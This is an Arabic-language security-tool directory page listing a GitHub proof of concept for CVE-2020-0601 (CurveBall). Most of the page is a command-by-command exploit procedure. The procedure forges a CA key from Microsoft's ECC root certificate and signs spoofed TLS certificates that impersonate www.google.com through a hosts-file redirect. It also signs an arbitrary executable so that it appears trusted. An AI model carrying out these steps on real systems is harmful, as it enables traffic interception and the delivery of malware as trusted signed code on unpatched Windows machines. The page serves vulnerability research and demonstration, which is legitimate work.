Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-0601_PoC — عرض توضيحي لثغرة CVE-2020-0601 والمعروفة باسم curveball. استنادًا إلى الـ PoCs المتاحة على https://github.com/kudelskisecurity/chainoffools و https://github.com/ly4k/CurveBall | Kitploit
أدوات/GitHubGitHub/joelbts/cve-2020-0601_poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالأمن الويبالتشفيراختبار الاختراق
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

عرض توضيحي لثغرة CVE-2020-0601 والمعروفة باسم curveball. استنادًا إلى الـ PoCs المتاحة على https://github.com/kudelskisecurity/chainoffools و https://github.com/ly4k/CurveBall

عرض المستودع
27منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مبني على POC الخاص بـ https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


المتطلبات/البرمجيات المستخدمة


python version 3.11 openssl version 3.1 osslsigncode version 2.5 مكتبات بايثون المستخدمة في gen-key.py و httpServer.py


توقيع شهادات TLS


إنشاء مفتاح CA مزوّر من شهادة الجذر الموثوقة (يجب أن تكون secp384r1 وبصيغة PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

إنشاء CA مزوّر باستخدام المفتاح المزوّر

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

إنشاء شهادة SSL أخرى (من أي نوع) سيتم توقيعها بواسطة الـ CA المزوّر

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

إنشاء طلب توقيع شهادة (CSR) للشهادة

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

توقيع طلب CSR باستخدام شهادة الـ CA المزوّرة

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

تشغيل خادم HTTPS بسلسلة الشهادات المزوّرة

python httpServer.py

على جهاز ويندوز

أضف <kali.machine.ip> www.google.com إلى ملف hosts (يعيد توجيه google إلى الخادم)

قم بزيارة HTTPS://www.google.com

يجب أن تكون الشهادة موثوقة، ويجب عرض 'Hello World'

إذا حدث خطأ، تأكد من صحة وقت النظام


توقيع الكود


إنشاء مفتاح CA مزوّر من شهادة الجذر الموثوقة (يجب أن تكون secp384r1 وبصيغة PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

إنشاء CA مزوّر باستخدام المفتاح المزوّر

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

إنشاء مفتاح جديد يمكن استخدامه لتوقيع الكود

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

إنشاء طلب توقيع شهادة باستخدام المفتاح، والذي يمكننا توقيعه

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

توقيع طلب CSR باستخدام الـ CA المزوّر

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

تجميع المفتاح والشهادة والـ CA المزوّر في ملف PKCS12 لتوقيع ملفات exe

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

استخدام ملف PKCS12 لتوقيع ملف تنفيذي

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

تنزيل الأداة